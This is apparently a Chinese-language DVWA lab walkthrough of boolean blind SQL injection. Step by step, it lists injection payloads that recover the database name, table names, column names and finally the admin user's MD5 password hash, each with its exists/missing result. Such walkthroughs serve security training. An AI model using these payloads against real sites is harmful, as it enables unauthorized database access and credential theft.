DVWA靶场SQL Injection-Bool注入(盲注)

 1.判断注入点

1 exists

DVWA靶场SQL Injection-Bool注入(盲注)_第1张图片

1' missing

DVWA靶场SQL Injection-Bool注入(盲注)_第2张图片

(以下的图片同上,不过多陈述)

2.判断类型

1 and 1=1# exists

1 and 1=2# exists

不是数字型

1' and 1=1# exists

1' and 1=2# missing

是字符型

3.爆数据库名

(1)爆数据库名的长度

1' and length(database())>10# missing

1' and length (database ())>5# missing

1' and length(database())>3# exists

1' and length(database())=4# exists

(2)猜解数据库名的组成字符

第1个字符

1' and ascii(substr(database(),1,1))>108# missing

1' and ascii(substr(database(),1,1))>102# missing

1' and ascii(substr(database(),1,1))>99# exists

1' and ascii(substr(database(),1,1))=100# exists

说明第一个字符的ascii码为100,是d

第2个字符

1' and ascii(substr(database(),2,1))>108# exists

1' and ascii(substr(database(),2,1))>150# missing

1' and ascii(substr(database(),1,1))=118# exists

是v

第3个字符

1' and ascii(substr(database(),1,1))=119# exists

是w

第4个字符

1' and ascii(substr(database(),1,1))=97# exists

是a

所以数据库名是'dvwa'

4.爆数据表

(1)猜解数据库的表的个数

1' and (select count(table_name) from information_schema.tables where table_schema ='dvwa')>5#  missing

 1' and (select count(table_name) from information_schema.tables where table_schema ='dvwa')>3#  missing

 1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#  exists

2个表

(2)猜解数据库的表名的字符长度

第1个表

第1个表的字符长度

1' and length(substr((select table_name from information_schema.tables where  table_schema='dvwa'  limit 0,1),1))>10#  missing

1' and length(substr((select table_name from information_schema.tables where table_schema ='dvwa'  limit 0,1),1))=9#  exists

第1个表的字符长度为9

第2个表

第2个表的字符长度

1' and length(substr((select table_name from information_schema.tables where  table_schema='dvwa'  limit 1,1),1))=5#  exists

第1个表的字符长度为5

猜解数据库的表名的组成字符

第1个表

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>108 # missing

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 # exists

说明第一个字符的ascii码为103,是g

依次猜解出其他位置的字符分别为:u、e、s、t、b、o、o、k
所以第1个表的名称为:guestbook

第2个表

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108 #   exists

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117 #   exists

说明第一个字符的ascii码为117,是u

依次猜解出其他位置的字符分别为:s、e、r、s
所以第2个表的名称为:users
5.爆字段名

(1)猜解users表中的字段数目

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 # exists

所以users表中有8个字段

猜解users表中的各个字段的名称

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='user')=1 #  exists

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #  exists
users表中存在字段user和password

  1. 爆字段值

(1)1' and length(substr((select user from users limit 0,1),1))=5 #  exists

user字段中第1个字段值的字符长度=5

1' and length(substr((select password from users limit 0,1),1))=32 #  exists

password字段中第1个字段值的字符长度=32

猜测用来md5的加密方式保存

  1. 用日常积累经验猜测+运气,去碰撞完整字段值的全名

user

password

md5($password)

admin

password

5f4dcc3b5aa765d61d8327deb882cf99

1' and substr((select user from users limit 0,1),1)='admin' #  exits

1' and (select count(*) from users where user='admin')=1 #  exits

1' and (select count(*) from users where user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99')=1 #  exists

所以用户名和密码user,password字段的第1组取值:admin和password

你可能感兴趣的:(sql,数据库,oracle)